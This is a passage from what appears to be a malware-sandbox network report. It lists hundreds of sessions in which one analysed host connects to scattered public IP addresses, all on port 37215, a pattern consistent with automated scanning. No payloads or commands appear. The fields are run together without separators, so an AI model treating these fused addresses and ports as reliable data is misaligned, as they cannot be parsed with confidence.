                                                  15640192.168.2.1356486197.171.194.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15641192.168.2.134169066.41.54.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15642192.168.2.135399494.88.39.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15643192.168.2.1343102197.207.188.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15644192.168.2.1351690197.40.104.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15645192.168.2.1357546197.118.84.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15646192.168.2.1335658157.46.253.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15647192.168.2.1344538197.116.19.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15648192.168.2.135833641.221.97.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15649192.168.2.1339688216.88.189.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15650192.168.2.133414241.181.98.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15651192.168.2.1335714208.13.33.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15652192.168.2.133665041.7.203.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15653192.168.2.136058441.10.27.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15654192.168.2.134958686.146.197.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15655192.168.2.1338502157.241.30.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15656192.168.2.1350906157.219.123.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15657192.168.2.133604812.224.137.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15658192.168.2.1352004197.111.184.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15659192.168.2.1342056197.205.107.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15660192.168.2.1334602157.233.114.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15661192.168.2.1338238197.105.194.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15662192.168.2.1342172157.114.106.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15663192.168.2.1347704157.144.80.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15664192.168.2.1337814197.39.4.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15665192.168.2.1346664101.115.45.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15666192.168.2.1357358197.46.138.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15667192.168.2.1336758133.216.60.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15668192.168.2.1345022201.99.95.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15669192.168.2.1348320145.241.121.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15670192.168.2.134986641.115.130.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15671192.168.2.135776895.247.31.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15672192.168.2.1334616135.71.163.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15673192.168.2.135187041.127.77.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15674192.168.2.1348630197.221.97.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15675192.168.2.1334334157.142.221.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15676192.168.2.1337234157.116.2.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15677192.168.2.1339718197.236.158.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15678192.168.2.133944047.59.196.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15679192.168.2.1336126157.210.210.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15680192.168.2.133780641.165.133.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15681192.168.2.134614641.187.0.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15682192.168.2.1353484197.208.78.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15683192.168.2.1334934212.22.202.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15684192.168.2.135396641.53.157.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15685192.168.2.1359866157.106.191.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15686192.168.2.1341648157.254.2.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15687192.168.2.1359058197.255.100.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15688192.168.2.134045841.62.132.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15689192.168.2.1360072197.90.50.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15690192.168.2.1349644157.4.5.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15691192.168.2.1340384197.117.74.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15692192.168.2.135070241.143.63.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15693192.168.2.1337288191.50.206.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15694192.168.2.1334838111.131.239.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15695192.168.2.1360938157.28.202.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15696192.168.2.133767485.222.103.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15697192.168.2.1337500197.184.177.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15698192.168.2.1349358163.207.201.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15699192.168.2.1333636173.92.231.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15700192.168.2.1347934161.248.210.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15701192.168.2.1360298156.173.106.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15702192.168.2.1357194197.183.118.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15703192.168.2.1350796157.74.150.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15704192.168.2.1348914197.130.31.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15705192.168.2.1343730197.240.236.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15706192.168.2.1344354197.236.71.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15707192.168.2.1338928106.99.112.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15708192.168.2.1342086178.228.118.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15709192.168.2.1353202197.35.101.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15710192.168.2.134929641.77.173.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15711192.168.2.1358756197.113.157.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15712192.168.2.1348084168.26.146.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15713192.168.2.133881041.35.199.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15714192.168.2.1336270130.143.17.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15715192.168.2.135811658.243.28.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15716192.168.2.1337786197.3.155.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15717192.168.2.1342632197.209.22.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15718192.168.2.133541441.161.23.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15719192.168.2.135748252.175.20.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15720192.168.2.135937641.137.127.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15721192.168.2.1335476157.76.58.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15722192.168.2.134705041.211.22.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15723192.168.2.1357142157.198.65.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15724192.168.2.1341612203.203.214.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15725192.168.2.1334356157.63.34.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15726192.168.2.1349436157.86.89.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15727192.168.2.1337866172.162.217.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15728192.168.2.133560641.198.97.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15729192.168.2.134965232.202.170.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15730192.168.2.1348112109.187.165.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15731192.168.2.1360456157.10.210.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15732192.168.2.135475641.238.68.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15733192.168.2.1336840197.190.231.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15734192.168.2.1349246197.160.144.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15735192.168.2.135755441.27.248.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15736192.168.2.1352930197.52.26.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15737192.168.2.1359410197.0.206.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15738192.168.2.135231641.184.48.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15739192.168.2.1352908110.177.181.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15740192.168.2.1345784197.65.193.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15741192.168.2.1346826197.207.24.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15742192.168.2.1352618157.242.189.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15743192.168.2.1352528202.36.148.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15744192.168.2.1343818157.88.8.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15745192.168.2.1342936157.41.52.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15746192.168.2.133449241.171.35.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15747192.168.2.1360248157.61.212.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15748192.168.2.135606841.191.76.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15749192.168.2.1352854197.39.195.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15750192.168.2.136027041.202.106.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15751192.168.2.136062612.64.167.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15752192.168.2.1337000197.137.151.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15753192.168.2.1336262157.1.194.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15754192.168.2.136074641.81.245.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15755192.168.2.1347862197.81.172.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15756192.168.2.135775441.74.225.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15757192.168.2.1337484157.185.225.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15758192.168.2.135497446.77.114.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15759192.168.2.1345332197.66.150.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15760192.168.2.134490641.13.192.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15761192.168.2.1346724172.239.40.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15762192.168.2.1339614197.155.163.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15763192.168.2.134833275.160.15.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15764192.168.2.1347574157.47.109.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15765192.168.2.136039025.4.36.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15766192.168.2.1351054197.117.12.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15767192.168.2.133289441.38.49.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15768192.168.2.1359940172.34.99.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15769192.168.2.1354292157.253.139.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15770192.168.2.1352972197.48.198.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15771192.168.2.133807035.214.114.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15772192.168.2.134876841.176.33.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15773192.168.2.1353806143.156.30.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15774192.168.2.133872659.133.165.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15775192.168.2.133842241.50.99.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15776192.168.2.1356584157.215.84.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15777192.168.2.134330041.175.189.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15778192.168.2.1357206197.132.110.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15779192.168.2.1340144157.23.217.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15780192.168.2.1333464157.42.247.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15781192.168.2.1358430157.107.144.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15782192.168.2.135785641.166.176.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15783192.168.2.1345232197.147.226.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15784192.168.2.135354859.125.135.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15785192.168.2.136050683.225.163.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15786192.168.2.1349526197.147.159.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15787192.168.2.133767041.85.69.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15788192.168.2.1342576197.85.94.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15789192.168.2.1346956197.143.82.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15790192.168.2.1349088197.191.214.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15791192.168.2.1349400218.128.200.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15792192.168.2.1335376197.82.129.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15793192.168.2.1340624157.253.43.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15794192.168.2.1338470126.214.55.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15795192.168.2.1345448197.241.168.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15796192.168.2.136023463.40.45.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15797192.168.2.134902441.85.106.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15798192.168.2.1339688197.51.60.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15799192.168.2.1334140152.220.96.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15800192.168.2.1340746197.79.70.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15801192.168.2.1333282128.151.2.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15802192.168.2.133465041.214.65.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15803192.168.2.135490441.214.119.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15804192.168.2.1352424197.70.60.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15805192.168.2.136053045.148.129.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15806192.168.2.134602041.54.115.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15807192.168.2.136085041.237.241.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15808192.168.2.135791241.237.169.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15809192.168.2.135618050.104.154.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15810192.168.2.1350574197.127.238.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15811192.168.2.1346242197.245.189.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15812192.168.2.1340906188.33.176.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15813192.168.2.1336698157.186.122.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15814192.168.2.134576841.17.244.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15815192.168.2.1336148157.90.83.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15816192.168.2.1353032157.79.46.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15817192.168.2.133638851.144.240.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15818192.168.2.1353642157.12.58.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15819192.168.2.135210641.166.245.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15820192.168.2.1354942157.149.237.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15821192.168.2.1354004125.81.141.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15822192.168.2.1338140120.172.118.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15823192.168.2.1345758197.20.47.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15824192.168.2.1347982157.125.42.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15825192.168.2.1360050157.84.87.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15826192.168.2.1360232197.133.82.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15827192.168.2.1360046125.202.248.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15828192.168.2.135309441.24.169.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15829192.168.2.1356392157.149.226.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15830192.168.2.1346308197.5.158.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15831192.168.2.135638641.105.243.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15832192.168.2.1349818157.102.217.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15833192.168.2.1337488154.176.191.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15834192.168.2.1350142138.146.27.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15835192.168.2.134317441.59.100.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15836192.168.2.1355044206.184.83.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15837192.168.2.133409241.227.123.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15838192.168.2.1348382157.39.161.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15839192.168.2.1335800157.234.255.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15840192.168.2.1337290197.144.14.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15841192.168.2.1351478157.232.218.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15842192.168.2.135645643.32.65.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15843192.168.2.1347714157.58.89.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15844192.168.2.1345528197.6.220.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15845192.168.2.1357482142.236.94.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15846192.168.2.133972441.76.76.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15847192.168.2.134422441.240.221.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15848192.168.2.135579697.248.176.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15849192.168.2.1338122197.124.180.13937215
